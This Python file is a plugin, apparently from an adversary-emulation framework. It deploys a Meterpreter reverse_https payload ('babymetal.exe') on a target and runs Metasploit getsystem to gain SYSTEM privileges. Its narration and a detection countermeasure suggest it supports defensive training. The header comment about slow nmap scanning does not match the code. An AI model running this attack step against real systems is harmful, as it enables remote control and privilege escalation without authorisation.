#!/usr/bin/env python3 # A plugin to nmap targets slow motion, to evade sensors from plugins.base.attack import AttackPlugin from app.metasploit import MetasploitInstant class MetasploitGetsystemPlugin(AttackPlugin): # Boilerplate name = "metasploit_getsystem" description = "Privilege elevation via metasploit getsystem" ttp = "????" references = ["https://docs.rapid7.com/metasploit/meterpreter-getsystem/"] required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share def __init__(self): super().__init__() self.plugin_path = __file__ def run(self, targets): """ Run the command @param targets: A list of targets, ip addresses will do """ self.attack_logger.start_narration("A metasploit command like that is used to get system privileges for the next attack step.") res = "" payload_type = "windows/meterpreter/reverse_https" payload_name = "babymetal.exe" target = self.targets[0] metasploit = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user) metasploit.smart_infect(target, payload_type, payload_name, ) metasploit.getsystem(target, situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." ) return res